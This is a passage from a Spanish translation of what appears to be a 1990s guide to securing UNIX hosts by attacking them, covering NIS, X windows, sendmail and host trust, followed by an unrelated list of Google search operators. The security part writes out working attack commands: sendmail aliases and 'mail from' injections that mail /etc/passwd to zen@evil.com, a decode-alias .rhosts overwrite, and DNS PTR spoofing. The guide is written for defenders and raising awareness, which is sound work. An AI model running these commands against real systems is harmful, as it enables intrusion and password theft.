esto es el alias “decode” que “uudecodea” archivos mail que le son mandados). Por ejemplo, aquí creas un alias “foo”, que mailea el fichero password de vuelta a evil.com simplemente maileandole cualquier mensaje: nis-master # echo 'foo: "|mail zen@evil.com< /etc/passwd "' >> /etc/aliases nis-master # cd /var/yp nis-master # make aliases nis-master # echo test | mail -v foo@victim.com Por suerte los atacantes no tendran control de tu NIS master host, pero mas aun laa leccion esta clara – NIS normalmente no es seguro, pero si un atacante se hace con el control de tu NIS master, efectivamente tendra de los hosts clientes(por ejemplo podra ejecutar comandos arbitarrios). No hay demasiadas defensas contra estos ataques; es un servicio inseguro que casi no tiene autentificacion entre clientes y servers. Para mas INRI, parece claro que se pueden forzar mapas aleatorios incluso en servidores maestros (ej, es posible tratar a un servidor NIS como si fuera un cliente). Obviamente, esto echaria abajo todos los esquemas. Ni es absolutamente necesario usar NIS, el usar un nombre de dominio dificil de adivinar facilitaria mucho las cosas, pero si usas clientes sin disquetera que estan expuestos a atacantes en potencia, entonces es insignifante para este atacante el sobrepasar este simple paso haciendo uso del truco del bootparam para conseguir el nombre de dominio. Si el NIS es usado para propagar los mapas de passwords, entonces los shadowed passwords no ofrecen ningun tipo de proteccion adicional ya que el mapa shadow seria aun accesible para cualquier atacante que fuera root en un host de ataque. Lo mehjor es usar NIS lo menos posible, o por lo menos darse cuenta de que los mapas pueden ser objeto de lectuta por fuerzas potencialmente hostiles. El tener un protocolo RPC seguro disminuye en gran medida la amenaza, pero tiene sus propios problemas, principalmente en que es dificil de administrar, pero tambien en que los metodos de criptologia usados no son muy poderosos. Hay rumores de que NIS+, el nuevo servicio de informacion de red de Sun, soluciona alguno de los problemas, pero hasta ahora se ha limitado a correr bajo Suns. Finalmente, el usar filtrado de paquetes(packet filtering)en el puerto 111 o securelib (ver apendice D), o, para Suns, aplicar el parche 100482-02 de Sun, puede tambien ayudar. ----- El portmapper (mapeador de puertos) solo sabe de servicios RPC. Otros servicios de red pueden ser localizados con el metodo de fuerza bruta que conecta a todos los puertos de la red. Muchas utilidades de red y sistemas basados en ventanas “escuchan” en puertos especificos (ej, sendmail esta en el puerto 25, telnet en el 23, X windows normalmente esta en el 6000, etc). SATAN incluye un programa que escanea los puertos de un host remoto e informa lo que ha encontrado; si lo ejecutaras contra nuestra victima verias lo siguiente: evil % tcpmap victim.com Mapping 128.128.128.1 port 21: ftp port 23: telnet port 25: smtp port 37: time port 79: finger port 512: exec port 513: login port 514: shell port 515: printer port 6000: (X) Esto sugiere que victim.com esta corriendo X windows. Si no esta correctamente protegido (por via de la cookie magica,magic cookie, o por mecanismos xhost), el contenido de las ventanas podria capturarse u observarse, lo que teclean los usuarios robado, ejecutar programas remotamente, etc. Tambien, si la victima esta usando X windows y acepta un telnet por el puerto 6000 (X), esto podria ser usado para un ataque de denegacion de servicio (denial of service attack), ya que el sistema de ventanas de la victima se suele mantener “congelado” por unos instantes. Un metodo para determinar la vulnerabilidad de un servidor X (corriendo X windows) es el de conectarse al mismo por medio de la funcion XOpenDisplay(); si esta nos da como resultado NULL entonces no puedes acceder al display de la victima (opendisplay es parte de SATAN): char *hostname; if (XOpenDisplay(hostname) == NULL) { printf("Cannot open display: %sn", hostname); } else { printf("Can open display: %sn", hostname); } evil % opendisplay victim.com:0 Cannot open display: victim.com:0 Los terminales X, aunque mucho menos potentes que un sistema UNIX completo, pueden tener sus propios problemas de seguridad. Muchos terminales X permiten accesos rsh no restringidos, permitiendote iniciar programas clientes X en el terminal de la victima apareciendo los resultados en tu propia pantalla: evil % xhost +xvictim.victim.com evil % rsh xvictim.victim.com telnet victim.com -display evil.com En cualquier caso, dale la misma importancia a la seguridad de tu sistema de ventanas, como a la de tu sistema de archivos y utilidades de red, ya que si no puede comprometer tu sistema igual que un “+” en el host.equiv o una cuenta root sin password. Lo siguiente es examinar el sendmail. Sendmail es un programa muy complejo que tiene un largo historial de problemas de seguridad, incluyendo el infame comando “wiz” (por suerte hace mucho que se deshabilito en todas las maquinas). A menudo puedes determinar el sistema operativo, a veces hasta la version, de la victima, mirando al numero de version de sendmail. Esto, nos puede dar pistas acerca de como de vulnerable sera a cualquiera de los muchos bugs. Adicionalmente, puedes ver si usan el alias “decode”, que posee su propio set de problemas: evil % telnet victim.com 25 connecting to host victim.com (128.128.128.1.), port 25 connection open 220 victim.com Sendmail Sendmail 5.55/victim ready at Fri,6 Nov 93 18:00 PDT expn decode 250 <"|/usr/bin/uudecode"> quit El usar el alias “decode” es un riesgo de seguridad – permite a los atacantes en potencia sobreescribir cualquier fichero que fuese escribible por el poseedor de ese alias – a menudo un daemon, pero potencialmente cualquier usuario. Considera este trozo de mail – esto pondra a “evil.com” en el archivo .rhost del usuario zen si es que fuera escribible. evil % echo "evil.com" | uuencode /home/zen/.rhosts | mail decode@victim.com Si no se conocen o no hay home directories escribibles, una interesante variacion de esto sera la creacion de un archivo /etc/aliases.pag falso que contenga un alias con un comando que quieras ejecutar en tu victima. Esto puede funcionar debido a que en muchos sistemas los archivos aliases.pag y aliases.dir, que controlan los alias de mail del sistema, son escribibles para todo el mundo. evil % cat decode bin: "| cat /etc/passwd | mail zen@evil.com" evil % newaliases -oQ/tmp -oA`pwd`/decode evil % uuencode decode.pag /etc/aliases.pag | mail decode@victom.com evil % /usr/lib/sendmail -fbin -om -oi bin@victim.com < /dev/null Se pueden encontrar muchas cosas simplemente preguntando a sendmail si una direccion es aceptable (vrfy), o hasta donde se expande una direccion (expn). Cuando los servicios de finger o rusers se desabilitan, vrfy y expn pueden todavia ser usados para identificar cuentas de usuarios. Vrfy y expn pueden tambien ser usados para descubrir si el usuario esta ejecutando mail por medio de cualquier programa susceptible de ser explotado (ej, vacation, mail sorters, etc.). Puede ser una buena idea el desabilitar los comandos vrfy y expn: en la mayoria de las versiones, mira en el codigo fuente del archivo srvrsmtp.c, y o bien borra o cambia las dos lineas de la estructura CmdTab que tengan los strings “vrfy” y “expn”. Sites sin codigo pueden tambien desabilitarlos simplemente editando el ejecutable del sendmail con un editor binario y reemplazando “vrfy” y “expn” por espacios en blanco. El adquirir una version reciente del sendmail (ver apendice D) es tambien una gran idea, puesto que ha habido mas informes sobre bugs en el sendmail que encualquier otro programa UNIX. os bugs muy conocidos que deben ser tratados. El primero fue definitivamente arreglado en la version 5.59 de Berkeley; a pesar de los mensajes de abajo, para versiones de sendmail previas a la 5.59, “evil.com” se añade, a pesar de los mensajes de error, junto con los tipicos headers del mail, al archivo especificado: % cat evil_sendmail telnet victim.com 25 << EOSM rcpt to: /home/zen/.rhosts mail from: zen data random garbage . rcpt to: /home/zen/.rhosts mail from: zen data evil.com . quit EOSM evil % /bin/sh evil_sendmail Trying 128.128.128.1 Connected to victim.com Escape character is '^]'. Connection closed by foreign host. evil % rlogin victim.com -l zen Welcome to victim.com! victim % El segundo agujero, recientemente solucionado, permitia a cualquiera especificar comandos arbitrarios de shell y/o caminos de ruta para el remitente y/o direccion de destino. Los intentos por mantener los detalles en secreto fueron en vano, y extensas discusiones en listas de correo o grupos de news de usenet llevaron a revelar como explotar los bugs de algunas versiones. Como en muchos bugs de UNIX, casi todas las distribuciones de sendmail eran vulnerables al problema, ya que todas compartian un ancestral codigo fuente comun. El espacio nos impide discutirlo en su totalidad, pero un tipico ataque para conseguir el fichero de passwords seria de la siguiente manera: evil % telnet victim.com 25 Trying 128.128.128.1... Connected to victim.com Escape character is '^]'. 220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04 mail from: "|/bin/mail zen@evil.com < /etc/passwd" 250 "|/bin/mail zen@evil.com < /etc/passwd"... Sender ok rcpt to: nosuchuser 550 nosuchuser... User unknown data 354 Enter mail, end with "." on a line by itself . 250 Mail accepted quit Connection closed by foreign host. evil % Mientras escribiamos esto, se informa que la version 8.6.4 de sendmail (ver apendice D para informacion sobre como conseguirlo) es la unica variante del sendmail con todos los bugs recientes corregidos (ni de coña J). Confianza Para nuestro ultimo topico de vulnerabilidad, nos desviaremos de la estrategia practica que hemos seguido previamente para meternos un poco mas en la parte teorica, y discutir brevemente la nocion de la confianza. Las cuestiones e implicaciones de la vulnerabilidad aquí, son un poco mas sutiles y lejanas de alcanzar que las que hemos apuntado anteriormente; en el contexto de este texto usamos la palabra confianza siempre que se da la situacion de que un servidor (siempre que un host permite acceso remoto se le puede llamar servidor) permita que un recurso local sea usado por un cliente sin autentificacion de password cuando dicha autentificacion es normalmente requerida. En otras palabras, limitamos arbitrariamente la discusion a los clientes “disfrazados”. Hay muchas maneras de un host pueda confiar: los ficheros .rhosts y hosts.equiv que permiten el acceso sin verificacion de password; servidores basados en ventanas que permiten a los sistemas remotos el uso y abuso de privilegios; archivos exportados que controlan el acceso via NFS, y mas. Casi todos estos dependen de la conversion del IP del cliente al nombre del host para determinar si se concede el servicio o no. El metodo mas simple usa el archivo /etc/hosts para una busqueda directa. Sin embargo, hoy en dia la mayoria de hosts usan o bien DNS (Domain Name Service), NIS, o ambos para el servicio de busqueda del nombre. Una busqueda inversa ocurre cuando un servidor tiene una direccion IP (de una conexión de un cliente) y desea coger el correspondiente nombre del host del cliente. Auqnue el concepto de como funciona la confianza del host es bien sabido por muchos administradores de sistema, los peligros de la confianza, y el problema practico que representa, sin tomar en consideracion la interpretacion del nombre del host, es uno de los problemas menos entendidos que conocemos en Internet. Esto va mas alla de los obvios ficheros hosts.equiv y .rhosts; NFS, NIS, sistemas de ventanas – de hecho, muchos de los utiles servicios en UNIX estan basados en el concepto de que sites bien conocidos (para un administrador o ususario) son de alguna manera de confianza. Lo que no se entiende es como las redes atan de forma tan estrecha la seguridad entre lo que normalmente se consideran hosts inconexos. Cualquier forma de confianza puede ser engañada, burlada, o derribada, especialmente cuando la autoridad que tiene la responsabilidad de chequear los credenciales de un cliente esta o bien fuera del dominio administrativo del servidor, o cuendo el mecanismo de confianza esta basado de alguna forma en metodo que tiene una forma debil de autentificacion; normalmente ambos son el caso. Obviamente, si el host que contiene la base de datos (bien NIS, DNS, o o lo que sea) ha sido comprometido, el intruso puede convencer al host victima de que el viene de cualquier host de confianza; ahora es suficiente con encontrar que hosts son de confianza para la victima. Esta tarea es en gran medida facilitada examinado de donde los administradores de sistema y las cuentas del sistema (tales como root, etc.) se conectaron por ultima vez. Volviendo a nuestra victima, victim.com, puedes ver que la cuenta root asi como otras cuentas del sistema se conectaron desde big.victim.com. Cambias el registro PTR para evil.com de forma que cuando intentes hacer un rlogin (login remoto) desde evil.com a victim.com, evil.com intentara buscar tu nombre de host y encontrara lo que pusistes en el registro. Si el registro en la base de datos DNS es asi: 1.192.192.192.in-addr.arpa IN PTR evil.com y lo cambias por: 1.192.192.192.in-addr.arpa IN PTR big.victim.com entonces, dependiendo de como sea de ingenuo el software de victim.com, victim.com creera que el acceso proviene de big.victim.com, y, asumiendo que big.victim.com este en los ficheros /etc/hosts.equiv o /.rhosts, te sera posible aceder sin tener que proporcionar un password. Con NIS, es cuestion de o bien editar la base de datos del host en el NIS maestro (si es que este esta controlado por el intruso) o de burlar o forzar el NIS (ver discusion sobre la seguridad del NIS arriba) para proporcionar a la victima cualquier informacion que desees. Aunque mas complejos, dañinos e interesantes ataques pueden ser realizados por medio del DNS, el tiempo y el espacio no permiten cubrir dichos metodos aquí. Dos metodos puedem ser usados para prevenir dichos ataques. El primero es el mas directo, pero quizas mas poco practico. Si tu site no usa ningun metodo de confianza, no seras tan vulnerable al engaño de host. La otra estrategia es la de usar protocolos encriptados. El usar el seguro protocolo RPC (usado en NFS, NIS+, seguros) es un metodo; aunque ha sido “roto” criptograficamente, aun da mas seguridad que los procedimientos de autentificacion RPC que no usan ningun tipo de metodo de encriptacion. Otras soluciones, tanto de hardware (smartcards) como de software (Kerberos), estan siendo desarroladas, pero estan o bien incompletas o requieren cambios en el software de el sistema. El apendice B detalla los resultados de un estudio informal tomado de una variedad de hosts en Internet. protegiendo el sistema Es nuestra esperanza el que hallamos demostrado que incluso algunos de los aparentemente inocuos servicios ofrecidos (algunas veces inesperadamente) pueden ser “municion” para determinados crackers de sistemas. Pero, por supuesto, si la seguridad fuera nuestra unica preocupacion, los ordenadores jamas estarian encendidos, y enganchados a una red con literalmente millones de intrusos en potencia. Mas que dar avisos de que deberia o no ncenderse, ofreceremos algunas sugerencias generales: Si no puedes quitar el servicio finger, considera el instalar un nuevo finger daemon. Es raramente necesario el revelar el home directory de un usuario y la procedencia de su ultimo acceso. No corras NIS a menos que sea absolutamente necesario. Usalo lo menos posible. Jamas exportes sistemas de archivo NFS sin restriccion, a todo el mundo. Trata de exportar sistemas de archivos de solo lectura cuando sea posible. “Fortifica” y protege los servidores (ej, los hosts que dan un servicio a otros hosts – NFS, NIS, DNS, o lo que sea.). Solo permite cuentas administrativas en dichos hosts. Examina cuidadosamente los servicios ofrecidos por inetd y el mapeador de puertos (pormapper). Elimina todos aquellos que no sean totalmente necesarios. Usa los inetd wrappers de Wietse Venema, no para otra funcion que la de tener un log de las fuentes de conexiones a tu host. Esto aporta grandes mejoras a las caracteristicas de verificacion standard de UNIX, especialmente con referencia a los ataques de red. Si es posible, usa los metodos loghost de syslog para obtener informacion relacionada con la seguridad en un host seguro. Elimina los metodos de confianza a menos que su uso sea totalmente necesario. La confianza es tu enemigo. Usa passwords shadowed y el comando passwd para rechazar passwords pobres, debiles. Desabilita cuentas de usuario o de sistema no usadas o inactivas. Estate al tanto de la literatura actual (observa la lista de lectura y bibliografua sugerida al final de este documento) y de las herramientas de seguridad; informa a los demas acerca de problemas e incidentes de seguridad. Como minimo, suscribete a la lista de mail del CERT y de la revista PHRACK (ademas de la lista de mail de los firewalls, si tu site esta usando o piensa instalar firewalls) y lee los grupos de news de usenet acerca de seguridad para asi obtener la ultima informacion sobre problemas de seguridad. La ignorancia es el problema de seguridad mas mortal de los que estamos al tanto. Instala todos los parches de seguridad tan pronto como sea posible, en todos tus hosts. Examina la informacion de los parches de seguridad de otras distribuciones – muchos bugs (rdist, sendmail) son comunes en muchas variantes UNIX. Es interesante el ver que soluciones comunes para problemas de seguridad , tales como usar Kerberos o el usar passwords de usar y tirar o tokens digitales no son efectivas contra muchos de los ataques discutidos aquí. Recomendamos de verdad el uso de tales sistemas, pero alertamos que no son la solucion TOTAL a los problemas de seguridad – son parte de un esfuerzo ayor de proteger tu sistema. Conclusiones Tal vez ninguno de los metodos expuestos aquí sean sorprendentes; cuando se escribio este documento, no aprendimos mucho sobre como irrumpir en sistemas. Lo que aprendimos fue, testeando estos metodos en nuestros propios sistemas y en sites amigos, lo efectivos que son estos metodos a la hora de ganar acceso a un tipico host Unix de Internet. Cansado de tratar de teclear todo esto a mano, y deseando mantener nuestros propios sistemas mas seguros, decidimos poner en practica una herramienta de seguridad (SATAN) que trata de chequear hosts remotos al menos para alguno de los problemas discutidos aquí. La tipica respuesta, cuando informabamos a la gente acerca de nuestro documento y nuestra herramienta, era algo del estilo de “eso suena bastante peligroso – espero que no vayas a darlo a todo cristo. Pero ya que tu confias en mi, podria tener una copia?” Jamas pensamos en crear un cookbook o una herramienta de metodos y programas soobre/para irrumpir en sistemas – en vez de eso, vemos que estos mismos metodos fueron usados, todos los dias, contra nosotros y contra administradores de sistema amigos. Creemos que el propagar la informacion que normalmente no era accesible para aquellos que estuvieran fuera del underworld, podemos aumentar la seguridad incrementando la conciancia del peligro.. El intentar restringir el acceso a informacion “peligrosa” sobre seguridad nunca ha sido un metodo muy util para incrementar la seguridad; de hecho, lo contrario parece ser el caso, ya que los crackers de sistemas han sido reticentes a la hora de compartir informacion con otros. Mientras es casi seguro que alguna de la informacion aquí presentada es material nuevo para aspirantes a crackers de sistemas, y que algunos la usaran para ganarse accesos no autorizados en hosts, la evidencia presentada por nuestros tests muestra que hay un monton de sites inseguros, simplemente por que el administrador de sistema no sabe mucho mas – no son estupidos o lentos, simplemente no son capaces de pasar el poco tiempo que tienen libre explorando todas las materias de seguridad pertenecientes a sus sistemas. Combinado esto con el hecho de que no tienen un acceso facil a este tipo de informacion da como resultado sistemas pobremente defendidos. Esperamos (modetamente) que este documento provea de datos muy necesarios sobre como los sistemas son crackeados, y mas aun, explique por que se deben de dar ciertos pasos para proteger un sistema. El saber por que algo es un problema es, en nuestra opinion, la clave para aprender y hacer una eleccion informada e inteleginte para lo que la seguridad de tu sistema significa de verdad. ----- Apendice A: SATAN (Security Analysis Tool for Auditing Networks) Concebido originalmente hace unos años, SATAN es actualmente el prototipo de una vision mas amplia y comprensible de una herramineta de seguridad. En su encarnacion actual, SATAN prueba e informa remotamente acerca de varios bugs y debilidades en servicios de red y sistemas basados en ventanas, asi como tambien detalla tanta informacion util sobre la victima como le es posible. Entonces procesa los datos con un filtro y con lo que se calificaria como un sistema experto para al final generar el analisis de seguridad. A pesar de no ser particularmente rapido, es extremadamente adaptable y facil de modificar. SATAN consiste en varios sub-programas, cada uno de los cuales es un fichero ejecutable (perl, shell, binario compilado en C, lo que sea) que testea un host para una debilidad potencial dada. El añadir futuros programas de testeo es tan facil como poner un ejecutable en el directorio principal con la extension “.sat”; el programa principal lo ejecutara automaticamente. Este genera una serie de blancos (usando DNS y una version rapida de ping a la vez para llegar a los blancos en directo), y despues ejecuta cada uno de los programas sobre cada uno de los blancos. Un programa de interpretacion/filtrado de datos analiza despues el resultado, y finalmente un programa de informes digiere todo para ponerlo en un formato mas leible. El paquete entero, incluyendo el codigo fuente y la documentacion, estara disponible libremente al publico, via ftp anonimo y postenadolo a uno de los numerosos foros sobre codigo fuente de Usenet. Apendice B Un estudio informal llevado a cabo en al menos una docena de sites en Internet (educacionales, militares, y comerciales, con unos 200 hosts y 4000 cuentas) revelo que como media, alrededor del 10% de las cuentas de un site tenian archivos .rhosts. Cada uno de estos archivos promediaba 6 hosts confiados; sin embargo, no era raro el tener unas 100 entradas en el archivo .rhosts de una cuenta, y en algunas ocasiones, esta cifra estaba alrededor de 500! (Este no es un record del que uno deberia estar orgulloso de poseer). Adicionalmente, cada uno de los sites directamente en Internet (un site estaba practicamente tras un firewall) confiaba en un usuario o host en otro site – asi que, la seguridad del site no estaba bajo el control directo del administrador de sistema. Los sites mas grandes, con mas usuarios y hosts, tenian un porcentaje mas bajo de usuarios con archivos .rhosts, pero el tamaño de estos archivos era mayor, asi como el numero de hosts remotos de confianza. Aunque fue muy dificil el verificar cuantas de las entradas fueron validas, con nombres de host tales como "Makefile", "Message-Id:", and "^Cs^A^C^M^Ci^C^MpNu^L^Z^O", asi como unas pocas entradas de wildcard, nos cuestionamos la sensatez de poner la seguridad de un site en manos de sus usuarios. Muchos usuarios (especialmente los poseedores de largos archivos .rhosts) intentaron poner comentarios tipo shell en sus archivos .rhosts, que son intentados reolver como nombre de host validos por muchos sistemas UNIX. Desafortunadamente, un atacante puede entonces usar las tecnicas DNS y NIS de engaño del nombre de host discutidas antes para fijar sus nombres de host como "#" y entrar libremente. Esto pone en riesgo a muchos sites (al menos una distribucion es dada con comentarios en sus archivos /etc/hosts.equiv). Podrias pensar que estos sites no son tipicos, y, de hecho, no lo eran. Virtualmente todos los administradores saben un monton sobre seguridad y escriben programas de seguridad como hobby o como profesion, y muchos de los sites para los que trabajaron hicieron estudios de seguridad o crearon roductos de seguridad. Solo podemos suponernos como sera un site “tipico”. apendice C: Despues de recibir mail de un site que habia sido violado desde uno de nuestros sistemas, se inicio una investigacion. Con el tiempo, encontramos que el intruso estaba haciendolo desde una lista de sites “.com” (comerciales), buscando hosts con ficheros de password faciles de robar. En este caso, “facil de robar” se refiere a sites con un nobre de dominio NIS facil de adivinar y un servidor NIS de facil acceso. Sin saber cuan lejos habia llegado el intruso, parecia una buena idea el alertar a los sites que eran en si vulnerables al robo de passwords. De los 656 hosts de la lista del intruso, 24 tenian archivos de password susceptibles de robo – 1 de cada 25 hosts mas o menos!!. Un tercio de estos archivos contenia al menos una cuenta sin password con shell interactivo. Con un total de 1594 entradas, a una media de 10 minutos corriendo un password cracker (Crack) daria mas de 50 passwords, usando una estacion de trabajo Sun de gama baja. Otros 40 mas se encontaron en los siguientes 20 minutos; y un password de la cuenta root se encontro en solo 1 hora. El resultado despues de unos dias de crackeo fue: 5 passwords root, 19 de 24 archivos de password (80%) con al menos un password conocido, y 259 de 1594 (1 sexto) passwords adivinados. Apendice D: Como conseguir metodos de seguridad gratis en Internet Listas de mail: o The CERT (Computer Emergency Response Team) advisory mailing list. Mandar e-mail a cert@cert.org, y pedir que se te ponga en su lista de mail. o The Phrack newsletter. Mandar e-mail a phrack@well.sf.ca.us y pedir que se te añada en la lista. o The Firewalls mailing list. majordomo@greatcircle.com Poner lo siguiente: subscribe firewalls o Computer Underground Digest. Mandar e-mail a tk0jut2@mvs.cso.niu.edu, pidiendo que te pongan en la lista. Software gratis: COPS (Computer Oracle and Password System) disponible via ftp anonimo fde archive.cis.ohio-state.edu, in pub/cops/1.04+. The tcp wrappers disponibles via ftp anonimo de ftp.win.tue.nl, in pub/security. Crack esta disponible en ftp.uu.net, in /usenet/comp.sources.misc/volume28. TAMU is a UNIX auditing tool that is part of a larger suite of excellent tools put out by a group at the Texas A&M University. They can be gotten via anonymous ftp at net.tamu.edu, in pub/security/TAMU. Sources for ftpd and many other network utilities can be found in ftp.uu.net, in packages/bsd-sources. Source for ISS (Internet Security Scanner), a tool that remotely scans for various network vulnerabilities, is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume40/iss. Securelib is available via anonymous ftp from ftp.uu.net, in usenet/comp.sources.misc/volume36/securelib. The latest version of berkeley sendmail is available via anonymous ftp from ftp.cs.berkeley.edu, in ucb/sendmail. Tripwire, a UNIX filesystem integrity checker+, is available via anonymous ftp at ftp.cs.purdue.edu, in pub/spaf/COAST/Tripwire.

TRUCOS DE BÚSQUEDA EN GOOGLE Buscar frase exacta - Si quieres buscar una frase exacta, introdúcela entre comillas ("". Por ejemplo: "diarios deportivos" Encontrar páginas que incluyan determinadas palabras - Para encontrar páginas que incluyan determinadas palabras, pero no otras, deberemos incluir el signo '-' delante de las que no queremos buscar. Por ejemplo, para descubrir webs que incluyan la palabra 'tienda', pero no la palabra 'online': tienda -online Encontrar páginas que incluyan una determinada palabra u otra - Si pretendemos encontrar una determinada palabra u otra, usaremos 'OR' (o bien el símbolo '|' (AltGr+1). Por ejemplo, para buscar webs de en los que aparazca 'tienda' y 'zapatos', o bien 'tienda' y 'pantalones': tienda (zapatos OR pantalones) tienda (zapatos | pantalones) Forzar palabras para su búsqueda - Hay numerosas palabras (en español: 'a', 'de', 'el', ...; en inglés: 'to', 'of', 'the',...) que Google no tiene en cuenta en sus búsquedas, a no ser que lo indiquemos. Para ello, escribiremos el signo '+' delante de estas palabras. Por ejemplo, estas dos búsquedas no generan los mismos resultados: el mundo +el mundo Uso de comodines - Se puede hacer uso de comodines. Esto es, el símbolo '*' puede ser usado para sustituir a una palabra, y facilitar algunas búsquedas. Por ejemplo: "los * años" "los * * años" Mayúsculas y minúsculas - No es necesario distinguir las mayúsculas de las minúsculas. Estas dos búsquedas generan los mismos resultados: NoTiCiAs noticias Uso del comando Link: Lista todos los enlaces, que teniendo page rank 4 o más, apuntan a nuestra página. Su uso es sencillo: link:www.direccion.com Uso del comando Allinurl: Muestra todas las páginas indexadas de un dominio indicado, o bien, las páginas que tienen todas las palabras especificadas en su url. Su sintaxis es: allinurl:www.dominio.com Uso del comando Allintitle: Muestra las páginas que tienen todas las palabras especificadas en su título. allintitle: palabra1 palabra2 Devuelve las páginas que tienen palabra1 y palabra2 en su título. Uso del comando Allintext: Páginas que tengan todas las claves especificadas dentro de su body. Uso del comando Allinanchor: Páginas que tengan en el texto que las apuntan las palabras especificadas. Uso del comando Site: Indica un determinado dominio que le indiquemos para realizar la búsqueda. Un ejemplo de su uso sería: site:www.dominio.com palabra Esto busca todas las páginas con alguna ocurrencia 'palabra' dentro del dominio especificado. También lo podemos usar para saber cuántas urls tiene indexadas google de un dominio: Ejemplo: site:elhacker.net Google Buscar Buscar en elhacker.net Uso del comando Info: Nos muestra información sobre la página principal de un dominio especificado. info:www.dominio.com Uso del comando Inurl: Busca la palabra que le especifiquemos en la url, pero no pide que todas estén en la url como allinurl. Uso del comando Intitle: Busca la palabra que le especifiquemos en el título, pero no es necesario que todas estén en el título. Por ejemplo intile:clave1 clave2 Busca clave1 en la url. Uso del comando Cache: Nos lleva directamente a la versión que tiene google de una determinada página. cache:www.dominio.com Y directamente a la caché que tiene almacenada google de www.dominio.com. Uso del comando Related: Según google nos muestra sitios relacionados con la dirección que le especifiquemos, a saber que criterio sigue, porque los resultados más que malos, son nulos. No merece la pena usarlo. Uso del comando Stocks: Nos lleva a Yahoo Finance y nos muestra información de tipo financiero relacionada con la marca que le indiquemos. Uso del comando Filetype: Busca un tipo de documento especificado, por ejemplo: filetype:doc clave Busca ficheros '.doc' relacionados con 'clave'. ¿Útil, no?. Uso del comando Define: Este es el comando más reciente; busca la definición de una palabra indicada, de momento sólo funciona con palabras en inglés. Uso: define:mouth.